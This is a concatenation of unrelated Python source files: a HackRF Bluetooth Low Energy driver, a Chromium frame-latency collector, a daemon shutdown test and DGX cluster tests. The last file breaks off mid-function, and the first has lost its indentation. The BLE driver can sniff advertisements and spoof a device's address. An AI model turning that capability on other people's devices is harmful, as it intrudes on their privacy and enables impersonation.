class BLEHackRFDevice(wireless.SDRDevice):
'''
This device allows to communicate with a HackRF Device in order to interact with Bluetooth Low Energy protocol.
HackRF support is **experimental**, the demodulator is slow and it can only deal with advertisements.
The corresponding interfaces are : ``hackrfX`` (e.g. "hackrf0")
The following capabilities are actually supported :
+-------------------------------------------+----------------+
| Capability | Available ? |
+===========================================+================+
| SCANNING | yes |
+-------------------------------------------+----------------+
| ADVERTISING | yes |
+-------------------------------------------+----------------+
| SNIFFING_ADVERTISEMENTS | yes |
+-------------------------------------------+----------------+
| SNIFFING_NEW_CONNECTION | no |
+-------------------------------------------+----------------+
| SNIFFING_EXISTING_CONNECTION | no |
+-------------------------------------------+----------------+
| JAMMING_CONNECTIONS | no |
+-------------------------------------------+----------------+
| JAMMING_ADVERTISEMENTS | no |
+-------------------------------------------+----------------+
| INJECTING | no |
+-------------------------------------------+----------------+
| MITMING_EXISTING_CONNECTION | no |
+-------------------------------------------+----------------+
| HIJACKING_MASTER | no |
+-------------------------------------------+----------------+
| HIJACKING_SLAVE | no |
+-------------------------------------------+----------------+
| INITIATING_CONNECTION | no |
+-------------------------------------------+----------------+
| RECEIVING_CONNECTION | no |
+-------------------------------------------+----------------+
| COMMUNICATING_AS_MASTER | no |
+-------------------------------------------+----------------+
| COMMUNICATING_AS_SLAVE | no |
+-------------------------------------------+----------------+
| HCI_MONITORING | no |
+-------------------------------------------+----------------+
'''
sharedMethods = [
"getChannel",
"setChannel",
"isConnected",
"setAddress",
"getAddress",
"sniffAdvertisements",
"setAdvertising",
"setAdvertisingParameters",
"setScanningParameters",
"setScan",
"setScanInterval",
"getMode",
"getFirmwareVersion",
"getSerial",
"getAPIVersion",
"getDeviceIndex",
"getBoardName",
"getBoardID"
]
def __init__(self,interface):
self.ready = False
self.channel = 37
self.scanThreadInstance = None
self.advThreadInstance = None
self.scanInterval = 1
self.advData=b""
self.address = "11:22:33:44:55:66"
self.advType=ADV_IND
self.daType = "public"
self.oaType = "public"
self.destAddress = "00:00:00:00:00:00"
self.intervalMin = 200
self.intervalMax = 210
self.experimentalDemodulatorEnabled = False
super().__init__(interface=interface)
def isUp(self):
return self.sink.isReady() and self.sink.isReady()
def init(self):
if self.source.isReady() and self.sink.isReady():
self.ready = True
self.capabilities = ["ADVERTISING","SCANNING","SNIFFING_ADVERTISEMENTS"]
def send(self,packet):
self.transmitPipeline.setInput(bytes(packet))
def recv(self):
packet = self.receivePipeline.getOutput()
if packet is not None:
timestamp = time.time()
ts_sec = int(timestamp)
ts_usec = int((timestamp - ts_sec)*1000000)
rssi = 0
return (BTLE_PPI(
rssi_avg=rssi,
rssi_max=rssi,
rssi_min=rssi,
rssi_count=1,
btle_channel=self.channel,
btle_clkn_high=ts_sec,
btle_clk_100ns=ts_usec,
)/BTLE(packet[0]),
packet[1])
else:
return None
def buildReceivePipeline(self,interface):
self.source = sources.HackRFSource(interface)
if self.source.isReady():
self.source.setFrequency(channelToFrequency(self.channel) * 1000 * 1000)
self.source.setSampleRate(2 * 1000 * 1000)
self.source.setBandwidth(1 * 1000 * 1000)
self.source.setGain(30)
self.source.setLNAGain(20)
self.source.enableAntenna()
self.demodulator = self._getDemodulator()
self.decoder = BLEDecoder(samplesPerSymbol=2)
return (self.source >> self.demodulator >> self.decoder)
else:
return None
def _getDemodulator(self):
return (demodulators.FSK2Demodulator(
preamble="01101011011111011001000101110001",
size=8*40,
samplesPerSymbol=2)
if not self.experimentalDemodulatorEnabled else
demodulators.FasterFSK2Demodulator(
preamble="01101011011111011001000101110001",
size=8*40,
samplesPerSymbol=2) )
def setExperimentalDemodulator(self,enable=True):
self.experimentalDemodulatorEnabled = enable
if enable and self.receivePipeline is not None:
started = self.receivePipeline.isStarted()
if started:
self.receivePipeline.stop()
self.receivePipeline.updateDemodulator(self._getDemodulator())
if started:
self.receivePipeline.start()
def buildTransmitPipeline(self,interface):
self.sink = sinks.HackRFSink(interface)
if self.sink.isReady():
self.sink.setFrequency(channelToFrequency(self.channel) * 1000 * 1000)
self.sink.setSampleRate(2 * 1000 * 1000)
self.sink.setBandwidth(1 * 1000 * 1000)
self.sink.setTXGain(42)
self.sink.setLNAGain(40)
self.sink.enableAntenna()
self.modulator = modulators.GFSKModulator(samplesPerSymbol=2)
self.encoder = BLEEncoder(channel=37)
return (self.sink << self.modulator << self.encoder)
return None
def setAddress(self,address,random=False):
'''
This method allows to modify the BD address and the BD address type of the device, if it is possible.
:param address: new BD address
:type address: str
:param random: boolean indicating if the address is random
:type random: bool
:return: boolean indicating if the operation was successful
:rtype: bool
:Example:
>>> hackrfDevice.setAddress("11:22:33:44:55:66")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.address = address.upper()
self.daType = "random" if random else "public"
return True
def getAddress(self):
'''
This method returns the actual BD address of the device.
:return: str indicating the BD address
:rtype: str
:Example:
>>> device.getAddress()
'1A:2B:3C:4D:5E:6F'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.address.upper()
def setChannel(self, channel):
'''
This method changes the channel actually in use by the provided channel.
:param channel: new channel
:type channel: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if (channel >= 0 and channel <= 39 and channel != self.channel):
receiveEnabled = self.receivePipeline.isStarted()
transmitEnabled = self.transmitPipeline.isStarted()
if receiveEnabled:
self.receivePipeline.stop()
if transmitEnabled:
self.transmitPipeline.stop()
self.channel = channel
self.source.setFrequency(channelToFrequency(channel) * 1000 * 1000)
self.sink.setFrequency(channelToFrequency(channel) * 1000 * 1000)
self.decoder.setChannel(channel)
self.encoder.setChannel(channel)
if receiveEnabled:
self.receivePipeline.start()
if transmitEnabled:
self.transmitPipeline.start()
return True
return False
def getChannel(self):
'''
This method returns the channel actually in use.
:return: channel in use
:rtype: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channel
def sniffAdvertisements(self,address='FF:FF:FF:FF:FF:FF',channel=None):
'''
This method starts the advertisement sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffAdvertisements()
>>> device.sniffAdvertisements(channel=38)
>>> device.sniffAdvertisements(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if channel is not None and channel >= 37 and channel <= 39:
self.setChannel(channel)
self.receivePipeline.start()
def setScanInterval(self,seconds=1):
'''
This method allows to provide the scan interval (in second).
:param seconds: number of seconds to wait between two channels
:type seconds: float
:Example:
>>> device.setScanInterval(seconds=1)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.scanInterval = seconds
def _buildAdvertisement(self):
packet = BTLE()/BTLE_ADV(RxAdd=0x00 if self.oaType == "public" else 0x01,TxAdd=0x00 if self.daType == "public" else 0x01)
if self.advType == ADV_IND:
packet /= BTLE_ADV_IND(AdvA = self.address, data=EIR_Hdr(self.advData))
elif self.advType == ADV_DIRECT_IND:
packet /= BTLE_ADV_DIRECT_IND(AdvA = self.address, InitA = self.destAddress)
elif self.advType == ADV_NONCONN_IND:
packet /= BTLE_ADV_NONCONN_IND()
elif self.advType == ADV_SCAN_IND:
packet /= BTLE_ADV_SCAN_IND()
elif self.advType == SCAN_REQ:
packet /= BTLE_SCAN_REQ(AdvA = self.address, ScanA = self.destAddress)
elif self.advType == SCAN_RSP:
packet /= BTLE_SCAN_RSP(AdvA = self.address, data=EIR_Hdr(self.advData))
return packet
def _advertisingThread(self):
self.setChannel(37)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
self.setChannel(38)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
self.setChannel(39)
self.send(self._buildAdvertisement())
utils.wait(seconds=0.75)
def setAdvertising(self,enable=True):
'''
This method enables or disables the advertising mode.
:param enable: boolean indicating if the advertising mode must be enabled
:type enable: bool
:Example:
>>> device.setAdvertising(enable=True) # advertising mode enabled
>>> device.setAdvertising(enable=False) # advertising mode disabled
.. warning::
Please note that if no advertising and scanning data has been provided before this function call, nothing will be advertised. You have to set the scanning Parameters and the advertising Parameters before calling this method.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
if self.advThreadInstance is None:
self.receivePipeline.stop()
self.transmitPipeline.start()
self.advThreadInstance = wireless.StoppableThread(target=self._advertisingThread)
self.advThreadInstance.start()
else:
if self.advThreadInstance is not None:
self.advThreadInstance.stop()
self.transmitPipeline.stop()
self.advThreadInstance = None
self.receivePipeline.start()
def _scanThread(self):
self.sniffAdvertisements(channel=37)
utils.wait(seconds=self.scanInterval)
self.sniffAdvertisements(channel=38)
utils.wait(seconds=self.scanInterval)
self.sniffAdvertisements(channel=39)
utils.wait(seconds=self.scanInterval)
def isConnected(self):
'''
This method returns a boolean indicating if the device is connected.
:return: boolean indicating if the device is connected
:rtype: bool
.. warning::
This method always returns False, it allows to provides the same API as the HCI Device.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return False
def setScan(self,enable=True):
'''
This method enables or disables the scanning mode. It allows to change the channel according to the scan interval parameter.
:param enable: boolean indicating if the scanning mode must be enabled
:type enable: bool
:Example:
>>> device.setScan(enable=True) # scanning mode enabled
>>> device.setScan(enable=False) # scanning mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if enable:
self.sniffAdvertisements()
if self.scanThreadInstance is None:
self.scanThreadInstance = wireless.StoppableThread(target=self._scanThread)
self.scanThreadInstance.start()
else:
if self.scanThreadInstance is not None:
self.scanThreadInstance.stop()
self.scanThreadInstance = None
def setAdvertisingParameters(self,type = "ADV_IND",destAddr = "00:00:00:00:00:00",data = b"",intervalMin = 200, intervalMax = 210, daType='public', oaType='public'):
'''
This method sets advertising parameters according to the data provided.
It will mainly be used by *ADV_IND-like* packets.
:param type: type of advertisement (*available values :* "ADV_IND", "ADV_DIRECT_IND", "ADV_SCAN_IND", "ADV_NONCONN_IND", "ADV_DIRECT_IND_LOW")
:type type: str
:param destAddress: destination address (it will be used if needed)
:type destAddress: str
:param data: data included in the payload
:type data: bytes
:param intervalMin: minimal interval
:type intervalMin: int
:param intervalMax: maximal interval
:type intervalMax: int
:param daType: string indicating the destination address type ("public" or "random")
:type daType: str
:param oaType: string indicating the origin address type ("public" or "random")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.setScan(enable=False)
if type == "ADV_IND":
self.advType = ADV_IND
elif type == "ADV_DIRECT_IND":
self.advType = ADV_DIRECT_IND
elif type == "ADV_SCAN_IND":
self.advType = ADV_SCAN_IND
elif type == "ADV_NONCONN_IND":
self.advType = ADV_NONCONN_IND
elif type == "ADV_DIRECT_IND_LOW":
self.advType = ADV_DIRECT_IND_LOW
else:
io.fail("Advertisements type not recognized, using ADV_IND.")
self.advType = ADV_IND
self.destAddress = None if destAddr == "00:00:00:00:00:00" else destAddr
self.advData = data
self.daType = daType
self.oaType = oaType
self.intervalMin = intervalMin
self.intervalMax = intervalMax
io.warning("Advertising interval will be ignored")
def setScanningParameters(self, data):
'''
This method sets scanning parameters according to the data provided.
It will mainly be used by *SCAN_RESP* packets.
:param data: data to use in *SCAN_RESP*
:type data: bytes
.. warning::
This method does nothing, it allows to provides the same API as the HCI Device.
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
io.warning("Scanning not supported, this operation will be ignored")
def getFirmwareVersion(self):
'''
This method returns the firmware version of the current HackRF device.
:return: firmware version
:rtype: str
:Example:
>>> device.getFirmwareVersion()
'git-a9945ff'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getFirmwareVersion()
def getSerial(self):
'''
This method returns the serial number of the current HackRF device.
:return: serial number
:rtype: str
:Example:
>>> device.getSerialNumber()
'0000000000000000a06063c8234e925f'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getSerial()
def getAPIVersion(self):
'''
This method returns the API version of the HackRF library.
:return: API version as a tuple of (major, minor)
:rtype: tuple of (int,int)
:Example:
>>> device.getAPIVersion()
(1, 4)
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getAPIVersion()
def getDeviceIndex(self):
'''
This method returns the device index of the current HackRF.
:return: device index
:rtype: int
:Example:
>>> device.getDeviceIndex()
0
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getDeviceIndex()
def getBoardName(self):
'''
This method returns the board name of the current HackRF.
:return: board name
:rtype: str
:Example:
>>> device.getBoardName()
'HackRF One'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getBoardName()
def getBoardID(self):
'''
This method returns the board identifier of the current HackRF.
:return: board identifier
:rtype: int
:Example:
>>> device.getBoardID()
2
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.source.getBoardID()
|
surface_stats_collector.py | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import perf_tests_helper
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
_SURFACE_TEXTURE_TIMESTAMP_RE = '\d+'
class SurfaceStatsCollector(object):
"""Collects surface stats for a window from the output of SurfaceFlinger.
Args:
adb: the adb coonection to use.
window_package: Package name of the window.
window_activity: Activity name of the window.
"""
def __init__(self, adb, window_package, window_activity, trace_tag):
self._adb = adb
self._window_package = window_package
self._window_activity = window_activity
self._trace_tag = trace_tag
self._collector_thread = None
self._use_legacy_method = False
self._surface_before = None
self._get_data_event = None
self._data_queue = None
self._stop_event = None
def __enter__(self):
assert not self._collector_thread
if self._ClearSurfaceFlingerLatencyData():
self._get_data_event = threading.Event()
self._stop_event = threading.Event()
self._data_queue = Queue.Queue()
self._collector_thread = threading.Thread(target=self._CollectorThread)
self._collector_thread.start()
else:
self._use_legacy_method = True
self._surface_before = self._GetSurfaceStatsLegacy()
def __exit__(self, *args):
self._PrintPerfResults()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
def _PrintPerfResults(self):
if self._use_legacy_method:
surface_after = self._GetSurfaceStatsLegacy()
td = surface_after['timestamp'] - self._surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (surface_after['page_flip_count'] -
self._surface_before['page_flip_count'])
else:
assert self._collector_thread
(seconds, latencies) = self._GetDataFromThread()
if not seconds or not len(latencies):
logging.warning('Surface stat data is empty')
return
frame_count = len(latencies)
jitter_count = 0
last_latency = latencies[0]
for latency in latencies[1:]:
if latency > last_latency:
jitter_count = jitter_count + 1
last_latency = latency
perf_tests_helper.PrintPerfResult(
'surface_latencies', 'surface_latencies' + self._trace_tag,
latencies, '')
perf_tests_helper.PrintPerfResult(
'peak_jitter', 'peak_jitter' + self._trace_tag, [max(latencies)], '')
perf_tests_helper.PrintPerfResult(
'jitter_percent', 'jitter_percent' + self._trace_tag,
[jitter_count * 100.0 / frame_count], 'percent')
print 'SurfaceMonitorTime: %fsecs' % seconds
perf_tests_helper.PrintPerfResult(
'avg_surface_fps', 'avg_surface_fps' + self._trace_tag,
[int(round(frame_count / seconds))], 'fps')
def _CollectorThread(self):
last_timestamp = 0
first_timestamp = 0
latencies = []
retries = 0
has_collected_data = False
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
(t, last_timestamp) = self._GetSurfaceFlingerLatencyData(last_timestamp,
latencies)
if (t, last_timestamp) == (None, None):
retries += 1
if retries < 3:
continue
if has_collected_data:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
has_collected_data = True
if not first_timestamp:
first_timestamp = t
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put(((last_timestamp - first_timestamp) / 1e9,
latencies))
latencies = []
first_timestamp = 0
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
    """Wake the collector thread and block until it publishes data.

    Returns the (seconds, latencies) tuple posted by the collector thread,
    or re-raises any exception the collector pushed onto the queue.
    """
    # Signal the collector that the main thread wants the current window.
    self._get_data_event.set()
    result = self._data_queue.get()
    # The collector forwards its failures through the queue; surface them.
    if isinstance(result, Exception):
        raise result
    return result
def _ClearSurfaceFlingerLatencyData(self):
    """Clears the SurfaceFlinger latency data.

    Returns:
      True if SurfaceFlinger latency is supported by the device, otherwise
      False.
    """
    # A supported device prints nothing for --latency-clear; an unsupported
    # one dumps many lines, just like plain 'dumpsys SurfaceFlinger'.
    window = '%s/%s' % (self._window_package, self._window_activity)
    output = self._adb.RunShellCommand(
        'dumpsys SurfaceFlinger --latency-clear ' + window)
    return len(output) == 0
def _GetSurfaceFlingerLatencyData(self, previous_timestamp, latencies):
    """Returns collected SurfaceFlinger latency data.

    Args:
      previous_timestamp: The timestamp returned from the previous call or 0.
        Only data after this timestamp will be returned.
      latencies: A list to receive latency data. The latencies are integers
        each of which is the number of refresh periods of each frame.

    Returns:
      A tuple containing:
      - The timestamp of the beginning of the first frame (ns),
      - The timestamp of the end of the last frame (ns).
      The tuple may be (None, None) if there was no data collected (for example,
      if the app was closed before the collector thread has finished).
    """
    # adb shell dumpsys SurfaceFlinger --latency <window name>
    # prints some information about the last 128 frames displayed in
    # that window.
    # The data returned looks like this:
    # 16954612
    # 7657467895508  7657482691352  7657493499756
    # 7657484466553  7657499645964  7657511077881
    # 7657500793457  7657516600576  7657527404785
    # (...)
    #
    # The first line is the refresh period (here 16.95 ms), it is followed
    # by 128 lines w/ 3 timestamps in nanosecond each:
    # A) when the app started to draw
    # B) the vsync immediately preceding SF submitting the frame to the h/w
    # C) timestamp immediately after SF submitted that frame to the h/w
    #
    # The difference between the 1st and 3rd timestamp is the frame-latency.
    # An interesting data is when the frame latency crosses a refresh period
    # boundary, this can be calculated this way:
    #
    # ceil((C - A) / refresh-period)
    #
    # (each time the number above changes, we have a "jank").
    # If this happens a lot during an animation, the animation appears
    # janky, even if it runs at 60 fps in average.
    results = self._adb.RunShellCommand(
        'dumpsys SurfaceFlinger --latency %s/%s' %
        (self._window_package, self._window_activity), log_result=True)
    if not len(results):
        return (None, None)
    refresh_period = int(results[0])
    last_timestamp = previous_timestamp
    first_timestamp = 0
    for line in results[1:]:
        fields = line.split()
        # Malformed lines (anything without exactly 3 fields) are skipped.
        if len(fields) == 3:
            # Fix: int() replaces the Python-2-only long() builtin; Python 2
            # ints auto-promote to arbitrary precision, so behavior is
            # unchanged there while the code now also runs under Python 3.
            timestamp = int(fields[0])
            last_timestamp = int(fields[2])
            if timestamp > previous_timestamp:
                if not first_timestamp:
                    first_timestamp = timestamp
                # This is the integral equivalent of
                # ceil((C - A) / refresh-period); '//' keeps the result an
                # int under Python 3 (identical to '/' on Python 2 ints).
                latency_ns = int(last_timestamp - timestamp)
                latencies.append((latency_ns + refresh_period - 1) // refresh_period)
    return (first_timestamp, last_timestamp)
def _GetSurfaceStatsLegacy(self):
    """Legacy method (before JellyBean), returns the current Surface index
    and timestamp.

    Calculate FPS by measuring the difference of Surface index returned by
    SurfaceFlinger in a period of time.

    Returns:
      Dict of {page_flip_count (or 0 if there was an error), timestamp}.
    """
    results = self._adb.RunShellCommand('service call SurfaceFlinger 1013')
    assert len(results) == 1
    # Fix: raw string — the pattern previously relied on the invalid escape
    # sequences '\(' and '\w' inside a plain string literal, which warn on
    # Python 3.6+ and are slated to become errors.
    match = re.search(r'^Result: Parcel\((\w+)', results[0])
    cur_surface = 0
    if match:
        try:
            # The parcel payload is the hex-encoded surface (flip) index.
            cur_surface = int(match.group(1), 16)
        except Exception:
            logging.error('Failed to parse current surface from ' + match.group(1))
    else:
        logging.warning('Failed to call SurfaceFlinger surface ' + results[0])
    return {
        'page_flip_count': cur_surface,
        'timestamp': datetime.datetime.now(),
    }
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The worldwideweb Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test worldwidewebd shutdown."""
from test_framework.test_framework import worldwidewebTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
    """Issue a blocking waitfornewblock RPC to keep the node busy.

    Runs on a helper thread so the main test can shut the node down while
    this RPC is still in flight.
    """
    # On a fresh regtest chain only the genesis block exists (height 0).
    result = node.waitfornewblock()
    assert_equal(result['height'], 0)
class ShutdownTest(worldwidewebTestFramework):
    """Verify the daemon shuts down cleanly while an RPC is still in flight."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False

    def run_test(self):
        rpc_node = get_rpc_proxy(
            self.nodes[0].url, 1, timeout=600,
            coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        rpc_node.getblockcount()
        Thread(target=test_long_call, args=(rpc_node,)).start()
        # Wait until the server is executing the above `waitfornewblock`.
        self.wait_until(
            lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)
if __name__ == '__main__':
    # Entry point: run the shutdown test via the framework's standard runner.
    ShutdownTest().main()
|
test_dgx.py | import multiprocessing as mp
import os
import subprocess
from enum import Enum, auto
from time import sleep
import numpy
import pytest
from tornado.ioloop import IOLoop
from dask import array as da
from distributed import Client
from distributed.utils import get_ip_interface
from dask_cuda import LocalCUDACluster
from dask_cuda.initialize import initialize
from dask_cuda.utils import wait_workers
mp = mp.get_context("spawn")
psutil = pytest.importorskip("psutil")
class DGXVersion(Enum):
    """Known DGX server models, detected from the DMI product name."""
    # Explicit values match what auto() would have assigned (1-based, in order).
    DGX_1 = 1
    DGX_2 = 2
    DGX_A100 = 3
def _get_dgx_name():
    """Return the DMI product name of a physical DGX host, or None.

    Returns the first line of /sys/class/dmi/id/product_name (including its
    trailing newline, as callers expect for substring matching).  Returns
    None when either file is missing.
    """
    product_name_file = "/sys/class/dmi/id/product_name"
    dgx_release_file = "/etc/dgx-release"

    # We verify `product_name_file` to check it's a DGX, and check
    # if `dgx_release_file` exists to confirm it's not a container.
    if not os.path.isfile(product_name_file) or not os.path.isfile(dgx_release_file):
        return None

    # Fix: the original `for line in open(...)` leaked the file handle;
    # a context manager guarantees it is closed.
    with open(product_name_file) as f:
        for line in f:
            return line
    return None  # empty file (matches the original implicit None)
def _get_dgx_version():
    """Map the DMI product name onto a DGXVersion, or None if not a DGX."""
    name = _get_dgx_name()
    if name is None:
        return None
    # First matching marker wins; unknown models fall through to None.
    markers = (
        ("DGX-1", DGXVersion.DGX_1),
        ("DGX-2", DGXVersion.DGX_2),
        ("DGXA100", DGXVersion.DGX_A100),
    )
    for marker, version in markers:
        if marker in name:
            return version
    return None
def _get_dgx_net_devices():
    """Return the per-GPU "<openfabrics_device>,<interface>" list for this DGX.

    Each entry appears twice in GPU order because two GPUs share every
    InfiniBand NIC.  Returns None for models without a static mapping.
    """
    version = _get_dgx_version()
    if version == DGXVersion.DGX_1:
        mlx_indices = [0, 1, 2, 3]
    elif version == DGXVersion.DGX_2:
        mlx_indices = [0, 1, 2, 3, 6, 7, 8, 9]
    else:
        return None
    devices = []
    for ib_port, mlx_idx in enumerate(mlx_indices):
        entry = "mlx5_%d:1,ib%d" % (mlx_idx, ib_port)
        # Duplicate: two consecutive GPUs map to the same NIC.
        devices.extend([entry, entry])
    return devices
# Skip this whole module unless we are running on a physical DGX host.
if _get_dgx_version() is None:
    pytest.skip("Not a DGX server", allow_module_level=True)
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_default():
    """Child-process body: a default LocalCUDACluster must run a dask sum."""
    with LocalCUDACluster() as cluster:
        with Client(cluster):
            arr = da.from_array(numpy.arange(10000), chunks=(1000,))
            total = arr.sum().compute()
            assert total == 49995000
def test_default():
    """Run the default-cluster check in a fresh spawned process."""
    worker = mp.Process(target=_test_default)
    worker.start()
    worker.join()
    # exitcode 0 means every assertion in the child passed.
    assert not worker.exitcode
def _test_tcp_over_ucx():
    """Child-process body: TCP-over-UCX cluster computes and configures UCX."""
    ucp = pytest.importorskip("ucp")

    with LocalCUDACluster(enable_tcp_over_ucx=True) as cluster:
        with Client(cluster) as client:
            arr = da.from_array(numpy.arange(10000), chunks=(1000,))
            total = arr.sum().compute()
            assert total == 49995000

            def check_ucx_options():
                # Executed on every worker: verify the negotiated transports.
                conf = ucp.get_config()
                assert "TLS" in conf
                assert "tcp" in conf["TLS"]
                assert "sockcm" in conf["TLS"]
                assert "cuda_copy" in conf["TLS"]
                assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
                return True

            assert all(client.run(check_ucx_options).values())
def test_tcp_over_ucx():
    """Spawn the TCP-over-UCX check in its own process (isolates UCX config)."""
    ucp = pytest.importorskip("ucp")  # NOQA: F841
    worker = mp.Process(target=_test_tcp_over_ucx)
    worker.start()
    worker.join()
    assert not worker.exitcode
def _test_tcp_only():
    """Child-process body: plain-TCP cluster must still compute correctly."""
    with LocalCUDACluster(protocol="tcp") as cluster:
        with Client(cluster):
            arr = da.from_array(numpy.arange(10000), chunks=(1000,))
            total = arr.sum().compute()
            assert total == 49995000
def test_tcp_only():
    """Spawn the plain-TCP check in its own process."""
    worker = mp.Process(target=_test_tcp_only)
    worker.start()
    worker.join()
    assert not worker.exitcode
def _test_ucx_infiniband_nvlink(enable_infiniband, enable_nvlink, enable_rdmacm):
    """Child-process body: start a UCX cluster with the requested transports
    and verify both the computation result and each worker's UCX config."""
    cupy = pytest.importorskip("cupy")
    ucp = pytest.importorskip("ucp")

    net_devices = _get_dgx_net_devices()
    # Keep only the "<openfabrics_device>" half of each "dev,iface" entry.
    openfabrics_devices = [d.split(",")[0] for d in net_devices]

    # With InfiniBand, let dask-cuda pick each worker's device automatically.
    ucx_net_devices = "auto" if enable_infiniband else None
    cm_protocol = "rdmacm" if enable_rdmacm else "sockcm"

    # Configure the client-side UCX context to match the cluster settings.
    initialize(
        enable_tcp_over_ucx=True,
        enable_infiniband=enable_infiniband,
        enable_nvlink=enable_nvlink,
        enable_rdmacm=enable_rdmacm,
    )

    with LocalCUDACluster(
        interface="ib0",
        enable_tcp_over_ucx=True,
        enable_infiniband=enable_infiniband,
        enable_nvlink=enable_nvlink,
        enable_rdmacm=enable_rdmacm,
        ucx_net_devices=ucx_net_devices,
    ) as cluster:
        with Client(cluster) as client:
            # Trigger UCX initialization before reading back its config.
            res = da.from_array(cupy.arange(10000), chunks=(1000,), asarray=False)
            res = res.sum().compute()
            assert res == 49995000

            def check_ucx_options():
                # Executed on every worker: the negotiated transports must
                # reflect the requested features.
                conf = ucp.get_config()
                assert "TLS" in conf
                assert "tcp" in conf["TLS"]
                assert "cuda_copy" in conf["TLS"]
                assert cm_protocol in conf["TLS"]
                assert cm_protocol in conf["SOCKADDR_TLS_PRIORITY"]
                if enable_nvlink:
                    assert "cuda_ipc" in conf["TLS"]
                if enable_infiniband:
                    assert "rc" in conf["TLS"]
                return True

            if enable_infiniband:
                # Each worker must be pinned to the openfabrics device that
                # corresponds to its GPU index.
                assert all(
                    [
                        cluster.worker_spec[k]["options"]["env"]["UCX_NET_DEVICES"]
                        == openfabrics_devices[k].split(",")[0]
                        for k in cluster.worker_spec.keys()
                    ]
                )

            assert all(client.run(check_ucx_options).values())
# One spawned process per transport combination so UCX options of different
# parametrizations cannot leak into each other.
@pytest.mark.parametrize(
    "params",
    [
        {"enable_infiniband": False, "enable_nvlink": False, "enable_rdmacm": False},
        {"enable_infiniband": True, "enable_nvlink": True, "enable_rdmacm": False},
        {"enable_infiniband": True, "enable_nvlink": False, "enable_rdmacm": True},
        {"enable_infiniband": True, "enable_nvlink": True, "enable_rdmacm": True},
    ],
)
@pytest.mark.skipif(
    _get_dgx_version() == DGXVersion.DGX_A100,
    reason="Automatic InfiniBand device detection Unsupported for %s" % _get_dgx_name(),
)
def test_ucx_infiniband_nvlink(params):
    # Skip early when ucp is unavailable, before paying the spawn cost.
    ucp = pytest.importorskip("ucp")  # NOQA: F841
    p = mp.Process(
        target=_test_ucx_infiniband_nvlink,
        args=(
            params["enable_infiniband"],
            params["enable_nvlink"],
            params["enable_rdmacm"],
        ),
    )
    p.start()
    p.join()
    # exitcode 0 means all assertions in the child process passed.
    assert not p.exitcode
def _test_dask_cuda_worker_ucx_net_devices(enable_rdmacm):
    """Child-process body: launch dask-scheduler and dask-cuda-worker as real
    subprocesses and verify each worker's UCX_NET_DEVICES matches its GPU."""
    loop = IOLoop.current()
    ucp = pytest.importorskip("ucp")

    cm_protocol = "rdmacm" if enable_rdmacm else "sockcm"
    net_devices = _get_dgx_net_devices()
    openfabrics_devices = [d.split(",")[0] for d in net_devices]

    sched_addr = "127.0.0.1"

    # Enable proper variables for scheduler
    sched_env = os.environ.copy()
    sched_env["DASK_UCX__INFINIBAND"] = "True"
    sched_env["DASK_UCX__TCP"] = "True"
    sched_env["DASK_UCX__CUDA_COPY"] = "True"
